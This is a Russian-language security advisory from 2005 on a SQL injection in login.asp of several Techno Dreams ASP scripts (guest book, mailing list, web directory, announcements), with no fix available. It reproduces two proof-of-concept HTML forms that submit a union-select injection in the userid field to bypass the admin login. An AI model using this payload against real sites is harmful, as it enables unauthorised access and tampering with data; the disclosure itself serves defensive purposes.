SQL-инъекция в продуктах Techno Dreams
- Дата публикации:
- 31.10.2005
- Всего просмотров:
- 1249
- Опасность:
- Средняя
- Наличие исправления:
- Нет
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Удаленная
- Воздействие:
- Неавторизованное изменение данных
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
-
Techno Dreams Guest Book
Techno Dreams Mailing List
Techno Dreams Web Directory
Techno Dreams Announcement
Techno Dreams Web Directory
Techno Dreams Mailing List
Techno Dreams Guest Book
Techno Dreams Announcement
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость обнаружена в сценарии login.asp при обработке входных данных пользователей. Удаленный пользователь может послать специально сформированный POST запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:
<html>
<
h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<
p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<
p><a href="http://www.kapda.ir/"> Kapda - Security Science
Researchers
Institute
of Iran</a></p>
<
form method="POST" action="http://target/admin/login.asp">
<
input type="hidden" name="userid" value="'union all
select '1','1'
from admin where ''='">
<
input type="hidden" name="passwd" value="1">
<
input type="submit" value="Submit" name="submit">
<
/form></html>
<html>
<
h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<
p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<
p><a href="http://www.kapda.ir/"> Kapda - Security Science
Researchers
Institute
of Iran</a></p>
<
form method="POST" action="http://target/login.asp">
<
input type="hidden" name="userid" value="'union all
select '1','1'
from admin where ''='">
<
input type="hidden" name="passwd" value="1">
<
input type="submit" value="Submit" name="submit">
<
/form></html>
URL производителя: www.t-dreams.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Источник:
Ссылки:
Techno Dreams Scripts Vulnerabilities